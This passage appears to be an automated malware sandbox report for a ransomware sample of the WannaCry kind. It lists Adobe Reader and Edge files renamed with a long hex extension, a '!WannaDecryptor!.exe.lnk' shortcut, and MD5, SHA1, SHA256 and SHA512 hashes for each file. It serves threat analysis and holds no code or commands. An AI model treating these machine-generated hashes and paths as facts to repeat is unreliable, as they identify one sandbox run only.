C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
688B

MD5
5dcc2be90807a852eb22674c57449292

SHA1
645bae95565e6e82ca7a3bd7366913ebed9a96c0

SHA256
988bc662da40c715741d5c70e62259e1791ddbff6a94b2c643a6195d5087fcf2

SHA512
f360bb6778ec5143c16eec69ddc468ddd33b320cc2c8ef4468af6473b69731c8ea4a439e16ebe3e2e96af026ba4852481f02946063482e4fdc0f7fdea6a78bf3

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
1KB

MD5
41780cd364b6326abe58721c4549e538

SHA1
06a104ec9ef64c81491632c7eccd3d46a54144ca

SHA256
eb656c3ed0f9a2d81f5b3e2648c478878e1083cc127507f8b64faafd8889531b

SHA512
37dd2cbb1cdcc3f001bad67b074bdb8e94b3f0e461d0233058a08ca86e739cd16f21d9f679e39ce3547d80caf6aec3de5e036c2541fe0e034c850435e8f07c68

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
448B

MD5
6e035fc3228362eda186c174e27e85c7

SHA1
fdb9e4ee9b96be1b0151f4a98e31c9a9f009ebe8

SHA256
f954f97482e315b0e2e0f0454c424a6a18288b4621193442ff9c9fab49b6f76b

SHA512
cddcd173843d4a96621c75222d447b627e6092de115a39c596234e2487d97a54d4feb4b8de5d894dff48bc110fcec0752ad8473c8c2aee605db407edbc9b4b5e

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
624B

MD5
a38cf90e97f1b06cb1ef013c472dda0d

SHA1
666bd3beea7ff04f38c574bf184044c190dcc085

SHA256
be0605cba3428105db376c0c085df0badbdd08306ab9e25e9b81f96991df2f40

SHA512
677f241789893192016c622b99e1618d6aaaf056313bba4f3a6c05bbcb9275962539f6e4694544d4912fcfa2fd3617f78e79dd0d63b358de1bc5b98949a9d54f

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
400B

MD5
8b38e3494b7d943c1986d3232d6cdd39

SHA1
82fe34abd5b649d10ddec96dbfcedda0d49d663f

SHA256
e48ea2ccf0832cb5b03bfc98aee5a00c34eff71430b49ad2af3e42460fd01e38

SHA512
6874cbb28678554c281284c6c506af0923f4eb1eb81e460c97ae996590d1b50fb9456502670324242264738fbbef4635708e9952038d0fb5c8d2771e2f2fca3b

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
560B

MD5
db6192279b4c9014e47dc0106cd39279

SHA1
a8bd9ff8e6a5908272739ec876e6dc3dd7e294cf

SHA256
0cc5e0442c772c87d1ff28695a478691a96097fda9948f86d67e594133021726

SHA512
b0185983bd395f0e42e3a6b54cefff20131a39ddd36ad009fa4266aa8d08227eca73f5e8fad8f16102d5420fb96c380c65d7d1c0863ed0ab415fdc078817247a

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
400B

MD5
32ca88563f05e1c998ff789fab695c2d

SHA1
7458e5b1e6c0864e5171a28c89eadf35d291f609

SHA256
4cbe9c8e4f68d3be0b531233774beeb4f48cfbe3e3caffd89ddaaf9027597462

SHA512
10995153a8a5c4f7d97504c2ca249943c841f0b48e7875474d2c35f54d05e36b6fd8a5e93bf4b06fe59408b89e1ce3ddd92f9227dff566fadcd34442f6beda42

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
560B

MD5
d460acbcb452c9e73ccfcbd8e9b8399a

SHA1
a08c903f36be1477f2585a90adcce35e8ff401e3

SHA256
92661400131d55fb7ffc035d94ff39816b9499ba8bd8ed4e97a8dd657809659e

SHA512
889edf26708157dfe1c4eb969872e008884980503be2f3cb28f66324bfff72e72fa4a2bd3c448f7743df8d69d46fa336f7189055bee4d790fcdc12ba0a84c5fc

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
400B

MD5
a830a35ed3b62ca08e2c1dd30a857996

SHA1
1cb29b56a4f7f437b352e9af5733b54a98e8f4b4

SHA256
877eb11969fb68c5c36f97ecd45040ec36e9ce9e1be8f9cd94769096d9989fa0

SHA512
5b76ca5307b6627e6e518b2bdedf7760051100c862ce369442830506b38cf92b3d68a417afad0cbdb19ec93238ec57dd07c82b29f61d6f63534beb672d19b7ae

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
560B

MD5
08353df90941b0ea5a1a5cb179dfd6aa

SHA1
9d5fecc0da852a2a6c9abc74a1ab994c4ac2efd9

SHA256
037765ebb5b9f95af211e6ed8899238e25f04e942a18f25eb89efebc8f30ff18

SHA512
1efdce268e11e4fb4e6aedcb54b7244b6a15396449a091a74fc347d53fae1722f6edb287d998ad890bacacc8549f97adaa92fb01bb4cb7cf0e1e848f77a09d35

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
7KB

MD5
dc2c216c636a4043789f7cee514efaff

SHA1
5ac1c4461c2bc0a5b09356d6b11ae5d00b9cdc23

SHA256
506f38ef31cfac6b2e3576b57864238bdf539baf3fd9056260948d65b99f1f0e

SHA512
0b85cc83ad8a85054e45a17dea91001b789d981ce1be6595c8ed7144bc5e19de810f60d212deaac0a9cb5f6d0699963b826efb97ea5ab6e02e383bebe38a7ee9

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_ie8.gif.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
7KB

MD5
773d9ef8d0baa18157c10d0a23636245

SHA1
96e955d3be64d52f4014a11cd2b382aae3506ae3

SHA256
df18af21f147fe2d4955628a4407d6029bd9c265b65e53f08aa03b4fb0f610fb

SHA512
2be7f7b0179f71e1abc4ba9f44de4ae7b5e6eee967aa5ff9c284571270f493f37214af3d01e2b8b3bf19c8a8d648d0cfd142b81640208a0002299d45513466b1

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_retina.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
15KB

MD5
8a38b4e77ee95b48323830f452611ff9

SHA1
26a45d70e8e900e464d984800db4a77fbc8440f2

SHA256
e2f40e76779552b08492879b8cfa3bc38a87f98b5cd506244ab90788ea372ecc

SHA512
f89b2b410eb225f21ee226b95a2388f263d9a083455fb42420d3eb2ab6f50f3c116aa0a9ca59a9537367b0743103780812ea8b610a4aad84924ca5c11b0e1cee

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
8KB

MD5
39352987b8fe7b10aeab2fd2300d000e

SHA1
c0b9dd7ec39c67dc322bc8c09276febbc59fdb5b

SHA256
189c6b7e65acf4286ae284478b960f28ee63d6790ba0a39a12ac21b2a51b4cf1

SHA512
41de05a43051e4197818bd39b0bded32149bd7393644cca3fe4fc73790cbaead020b7983831fda88f169cc4845ea0f519a8b3c89bbe3eeef913bf619432f16da

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons_retina.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
17KB

MD5
2954a7520a7ea833cacdb9cf972097f8

SHA1
72f382c663cd40388d93549fd0b34d893ef1f968

SHA256
257fa082f6078ae6d5fc95d15089783d0aaab97a8c06e85ef01150cb8997d0e7

SHA512
4f6d959b70a22a8d1ade3da00dad3c0ec2ad764f3c5d68d37d418888514dc0dbcf5ad99ffff4b76fb17f2225b92d2412000f973085428f5feab9299f3c972ca9

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_pattern_RHP.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
192B

MD5
5c9256b48e0d6258c73fee21a1000d33

SHA1
fb41514344904a57febe80b5d4b5fdddf625d358

SHA256
45c80c14a9cccdbda6ea86819a485c3e30bc627a3f1498db80420c43f2deb26c

SHA512
3252a85cfab8a7db8157eda1f33b8ef9afdda322b2d8ef055b0a258ba59596938a022c6cb8de8b1c1c5d2c0b1b544685bb3a70702c98875d146271ef0d2a501f

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
704B

MD5
e0c3924c90d243974b2fb76bba896902

SHA1
e69f383d75983b9e615106d3530f24b17086c2bc

SHA256
4926b964055f1ed115db4ce6d01e2786b80ff8e479b662919642e7650cb92117

SHA512
e0b1d6e0675fe165cf99a7bdaeba26e144b9be1dd2cb0ed2cc9dbb31605b917508e67fec1fc0aff6ae0fdc376b42245f47ff3e5eece59509df0f005721df10ea

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
8KB

MD5
3ff5c747db77c0d57965f24101c4494d

SHA1
966912a0cbe6230d3f6fabc7a80fafe765c15e11

SHA256
a0b80493a93dfb1015f32354b6554134040fc8117b62fa4f455918009b8a404e

SHA512
b64a2788b7b450eae7231a2f3aefc3cb6e6081177deba1449a752f922575c4c3929098f607c663c6c40dc660ee00d24a1cd6bef77bc8320c7508659385bb1ac2

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations_retina.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
19KB

MD5
072e21f6922b974deb3402e39dbbaa52

SHA1
14a5f1ffd974fed80ad7e82c462cd4992919bcf2

SHA256
8271b49be158342a55db48276a042bd2bfae63e5ed9a2b1c2430757c33d06606

SHA512
8f5b192d0d1677365d6f96e8cf73c3108f78d62c4f0156c86351d99c1861b1f780f558321f385b6b563007cef8908616242bd2c3dfabb10a586fa3bf71cee308

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
832B

MD5
d09e06e4cb8359dc5e60def463182762

SHA1
2c3ead78f3e64a411d30788f2d98d53407072fe4

SHA256
8d604d28ea33f6f003e5d5d89fe31a87536de9f0c359e9b7a77af31ea9e22bb2

SHA512
33a2d57d99d69513d24940eb0ee44a9e50dd2a3b4f8392486b0dd0608da57e4d19ff214bab56814bf2da039b28261213c482f6747f8549477acf881cdfc48a58

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
1KB

MD5
d54af5d658884938b7dfeec02ee07c6d

SHA1
ea2dd76adb1523530f770743bdea713413a1c452

SHA256
9d6a71f431f9ef6411c0fa035ef1cd98c3030e9672659e9878e57c9e514998f6

SHA512
1683b06794788319a58cf1abaa191bfbc507dabc39bb2f1e672976ce7820bc477d2fac3a01993d97620b5161f3ce12f8527bad685d79e15ff381903c589922bc

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
1KB

MD5
6dc5fcdfc77478ba80ecdf9c4ba00b38

SHA1
c09645c7135573d44bef9fb8a9c4750cb3a73fff

SHA256
e6b1d75b7289ab4b8042c6e1132397ad15daab75472620e1c68db66222c3188f

SHA512
fddde8065402d48ee94071411111748ef0a24f794109d75c4be5ad2365e1683a09d5def4ffa045ae3b8f502142bcf4edd1dabfe86408ed912aef4e8d8f6e09e9

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main.css.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
816B

MD5
27b2a30004012280874bfce51dfb6e4d

SHA1
8ac9cde4472ff032338342174443524e071cbb78

SHA256
2e3942db3f6245d30b09dfebe8db74a8d226b8da4d4b9d3545250a43f04cc415

SHA512
a3e853fc85f74f6cfa17a85b4de3e731234e3f1a52d5c8dc82ee67482eac12628bc2d43641ac76ed0e7453f327cdc0bdf0394590d1439dd3579a12901cbf5a9c

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
2KB

MD5
eb0468233235376ed2bad048aca9854b

SHA1
03c45c2cd516b99bce295e3e431a543dd3f504b3

SHA256
fdf0aad1e50d9f09b5906470f2a454206d32a13aca42bfb256bc1a01811a7f10

SHA512
bd7ee88b815f5a09208ef7eeacedb3acdb9ef2d5c6c3a17014c8c1de850d0b4fab407c69fcaf7810bb0ffe1aa41bdb5f6173a15f1c7d1ec302730e672a98de8a

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
2KB

MD5
d89d6efdacd22b2dab62603bdb70bba3

SHA1
58c01839abf7af1011ff0b19f1fb3a9bc14befb8

SHA256
3a33186efd5adc918eaad8ebeaf1c6dcd26ab9ffbc78247db7a3f6dc66a4e36f

SHA512
8919eae054ea2e7898d510544b61efa4a185e101ffdcd40bd2deb8eb38b058b6f03dbb9eb69f5ee82f0bd9b5b3c71583dd8b66805daf821d5666ed63e0e1219b

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
4KB

MD5
e822179c5e1693863af9eb5c667b34eb

SHA1
e98b5c95d40f415cabd5433c9d4e1201df17db90

SHA256
75cc0d110965ed96d6bce123cafa53c3f4e6f3dd268d5f8f3e8388230fc96485

SHA512
8ffd6c32f172757ef31018320426d19ba0cbb67734396ff8c9746aba3b1521f07fc756d9a7675c36d2a9387cc5b04c52220e78e78bcb8245031de7cb2abc09d8

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
304B

MD5
63caa57a3f5ef42d5d363c9cd2ef7bf0

SHA1
3639d2e36a6935320f5c783a38aafb3d1b284e23

SHA256
34d58656d03dfe9fa71f2627e9f05d5da825abb8d375b95d128a13e886e745e8

SHA512
dc0ec8303356b02e3fc6b8794463a06a04ac5ceaa412e53b149acc27cb18502ffc9a82a8a5ddd54699d16e2354be9f4d335ebe939e9d12cfbf894f25c9240ae9

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
400B

MD5
9987e3619f27659077a2a2ac0b581b3f

SHA1
718778ecf0fd26a167e98c62f9e3bc18f9cb2a40

SHA256
0839a25232547f71a50d83b7db9761c705e3c38b0af98aa0218e173cbbbc249f

SHA512
0098ee5fe3a22bc1e2df375034d46b849a493d428b05d71fce44d2f393bb0301e956fb78fc49d7a6b5196be5d07bb6bf7b2334952cdec474e597b22e76614a28

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
1008B

MD5
0ef0b17753d2e75a08314c9db32c2a79

SHA1
f3154b2f47cd7d69614ed7796d7f99b0d3333726

SHA256
8c60e22a03dbb069a1a1583ba6fa395df4e20ce519d1a5e20dd86696d620b379

SHA512
377697e4208ec7a22e4442b086a180ce20018f469e898d8a03855500203f36be9db60c34b7837b2b82f46047b17065ccfdf8da51460517c9b443ea752a901356

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
1KB

MD5
fb65720979771e0d1878eac17d40d13e

SHA1
37690ef34ccae4801f775dd6ad1d07dcb6aa0faf

SHA256
4549aa119f845f29393ecc9b217b8959f7fd80013f5c7c23e33f0f423acd5cc4

SHA512
83d42dbbba5a2fc3b4bd6ae3f57ddd53827dc8efb2fff9ebdda52f86af85ce6aa92aac2cdf5ac1d2963643ac663e1413fc2e5db894e727bf71e0b1a2cbeb34a4

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
2KB

MD5
5246b97a198c5a3a49525c1a5a13e2be

SHA1
16c09970197929fa2e5891d85cdb051c56f6e2fc

SHA256
1a2576d7ca4bed3cf758275bc574af88e70ec584988a781f6df3285f1092a38f

SHA512
f9e4e937d4a9b08e42042a25c61164d1a8b726bd0fe858f079a8c3332e2ffe4ed5707178c01c553d458c43500097661656714b92ed48a57b3c649a5c9ddcfcb5

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
848B

MD5
7acadea7523f47025a09509b873e48a3

SHA1
cbf4ccb313b714dc3dd2daa42530b5564781b95e

SHA256
df293f8b12051c2dae5d9b8e995f326077b3042484da9f167446ff886c227311

SHA512
4cb9e3f1a11b811a4e14762459cde990b78548d233b2e83a854828e7f064c966892983864c39f6fa16b9a05a2a85599cfebf6d423769d003b833f7380137d1b7

Download Submit
C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
32KB

MD5
1f6c9eb66a49e81c9b5c82f9249b68e7

SHA1
d5551a3f481c424e88c66a7ac69084d31f3e0f11

SHA256
83398f5b3ed6c2b14aca942e96718ca52f1293f715dfe39e5a67cd16ab916941

SHA512
4327d010d8b648c4689380d5f68f95c629330f6dd555a751bb263f39ec30fab932927d3b66c37a45f9c2adbd0f81f0deed49e51f0529df53858739c38124ded5

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\Trust Protection Lists\Mu\Other.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
48B

MD5
42e661b436275222c8d4ef93d3ba70df

SHA1
ae7c595a2e1b103689f8d9e193194672003502c1

SHA256
53a69ad210ab6aa36b0950c31d1a8b4304e196fa47db1285291bb4a20fc4b547

SHA512
171fd9e5c9de3312b9d10e14386401b7be2c39e0f0efc5db1f5e5915de6849af2e72621cd2630fd8d1f3624468b7599ddea2fdfed2da786306237afc0a08838a

Download Submit
C:\Users\Admin\AppData\Local\!WannaDecryptor!.exe.lnk

Filesize
590B

MD5
b3a22d790c3fb5e585e50f30f8296ee4

SHA1
9bd404dc723d033f45158a3faecd0dd78341e88f

SHA256
c4e4b17dc44d1ec358d7e5c31eee08c261946a2739ee7c2df8ceb1b6bcb45908

SHA512
03585949d6fa1743467f0b897a30d8f20e920d3758402c7954434f186d086f273c7b9f05a62c1216af197ad0befb85a5ffbb3e526bd55227ead7f06e347cf96c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c0a1774f8079fe496e694f35dfdcf8bc

SHA1
da3b4b9fca9a3f81b6be5b0cd6dd700603d448d3

SHA256
c041da0b90a5343ede7364ccf0428852103832c4efa8065a0cd1e8ce1ff181cb

SHA512
60d9e87f8383fe3afa2c8935f0e5a842624bb24b03b2d8057e0da342b08df18cf70bf55e41fa3ae54f73bc40a274cf6393d79ae01f6a1784273a25fa2761728b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e11c77d0fa99af6b1b282a22dcb1cf4a

SHA1
2593a41a6a63143d837700d01aa27b1817d17a4d

SHA256
d96f9bfcc81ba66db49a3385266a631899a919ed802835e6fb6b9f7759476ea0

SHA512
c8f69f503ab070a758e8e3ae57945c0172ead1894fdbfa2d853e5bb976ed3817ecc8f188eefd5092481effd4ef650788c8ff9a8d9a5ee4526f090952d7c859f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
38KB

MD5
adf2df4a8072227a229a3f8cf81dc9df

SHA1
48b588df27e0a83fa3c56d97d68700170a58bd36

SHA256
2fd56ac4d62fec83843c83054e5548834a19001c077cdb224901237f2e2c0e4c

SHA512
d18ffc9a41157ea96014a503640b3a2a3931f578293e88cc05aa61c8223221d948c05637875d8e3ee5847b6a99341ea22b6a1aee67c170e27bde5e154cf1b9ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
37KB

MD5
182dce24d1c42028d5ec4c2fc75287ef

SHA1
b53931983e4529aa9cfbd8b437ce93c21c77f659

SHA256
a2d8a95b7eb990ac47ff4cb81a5ae79fd6c2e91b0bc419e5e815a86eed92766d

SHA512
842c4b820a15c64210f81d85a8a25d2a6bcdf27857df72735b66060189a96e74ffe3cbd0d365f4aca807a8e74852c5cc3c7cb22038d3d57f2a7266092c268bed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
20KB

MD5
0b17fd0bdcec9ca5b4ed99ccf5747f50

SHA1
003930a2232e9e12d2ca83e83570e0ffd3b7c94e

SHA256
c6e08c99de09f0e65e8dc2fae28b8a1709dd30276579e3bf39be70813f912f1d

SHA512
49c093af7533b8c64ad6a20f82b42ad373d0c788d55fa114a77cea92a80a4ce6f0efcad1b4bf66cb2631f1517de2920e94b8fc8cc5b30d45414d5286a1545c28

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
20KB

MD5
8a6c75eff757ff85baae87b6271d3037

SHA1
ecca4d5957ccadb55fd68b78cb9ea3652e787d36

SHA256
3db2b309952857eb76ea90ddddec16716753d71b9ffa9de1f37caa8a943af78f

SHA512
3523faf2acda1a407675832c1a86f914cf4aee681eaae5259a30d23f8653b75b302a57fddf4898dc1f2c419b0d35d9c3f02bba6b58d30a0a6aff640fe5f977e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
26KB

MD5
525579bebb76f28a5731e8606e80014c

SHA1
73b822370d96e8420a4cdeef1c40ed78a847d8b4

SHA256
f38998984e6b19271846322441f439e231836622e746a2f6577a8848e5eed503

SHA512
18219147fca7306220b6e8231ff85ebeb409c5cc512adff65c04437d0f99582751ccb24b531bbedf21f981c6955c044074a4405702c3a4fae3b9bf435018cc1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
18KB

MD5
8bd66dfc42a1353c5e996cd88dc1501f

SHA1
dc779a25ab37913f3198eb6f8c4d89e2a05635a6

SHA256
ef8772f5b2cf54057e1cfb7cb2e61f09cbd20db5ee307133caf517831a5df839

SHA512
203a46b2d09da788614b86480d81769011c7d42e833fa33a19e99c86a987a3bd8755b89906b9fd0497a80a5cf27f1c5e795a66fe3d1c4a921667ec745ccf22f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
18KB

MD5
f1dceb6be9699ca70cc78d9f43796141

SHA1
6b80d6b7d9b342d7921eae12478fc90a611b9372

SHA256
5898782f74bbdeaa5b06f660874870e1d4216bb98a7f6d9eddfbc4f7ae97d66f

SHA512
b02b9eba24a42caea7d408e6e4ae7ad35c2d7f163fd754b7507fc39bea5d5649e54d44b002075a6a32fca4395619286e9fb36b61736c535a91fe2d9be79048de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
58KB

MD5
1f843f390b3acb0323aea014f5543499

SHA1
f1489b429891ac81992e839c480de799c683cc7b

SHA256
2c10f15c3ab46236146ce10ad5118fff3f98b546969abba82369214365bac7b6

SHA512
d6b5513351f4ca80ffe3e2d3ac3593f2280ad447ff805e8bd51123ac1e4c71702f2187368bffdaec50297a4da322adb0e46ad9975a774c1cbc150c4aef6c709d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

Filesize
40KB

MD5
01c37712c53beaec90552077a4235057

SHA1
0a1b1f47f36052ff504431b8cc75aab470ef2b70

SHA256
aa3bfd95713e4d5c76703b2ef5267b94dded413f000ba3a46ac391086831b38e

SHA512
be81978f7854a3100ec49d4c12a730af96df1e97e35fe182fddf8db6124c6780913a17210e4b268d261a9e107ed75811833d698e85d6ca325847a1ffad895b9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
18KB

MD5
3bdfb3c6756778ebe8831ecd1256ebef

SHA1
7d7bb7c73976f5d48432d92ac7c58143a94e686c

SHA256
5234f81b6e3656dbeac1b845c77aa32511d880af982ecdfad1dc3cce73f12b2c

SHA512
45046c4f0ca6c133be9d1181f03e5d41ff11914ed0663667a4556d700d392da4c261844b3d90bc979e6ee7e07cef3561b5d85c4f98544bbca853f77cc397fbfe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

Filesize
53KB

MD5
2ee3f4b4a3c22470b572f727aa087b7e

SHA1
6fe80bf7c2178bd2d17154d9ae117a556956c170

SHA256
53d7e3962cad0b7f5575be02bd96bd27fcf7fb30ac5b4115bb950cf086f1a799

SHA512
b90ae8249108df7548b92af20fd93f926248b31aedf313ef802381df2587a6bba00025d6d99208ab228b8c0bb9b6559d8c5ec7fa37d19b7f47979f8eb4744146

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

Filesize
87KB

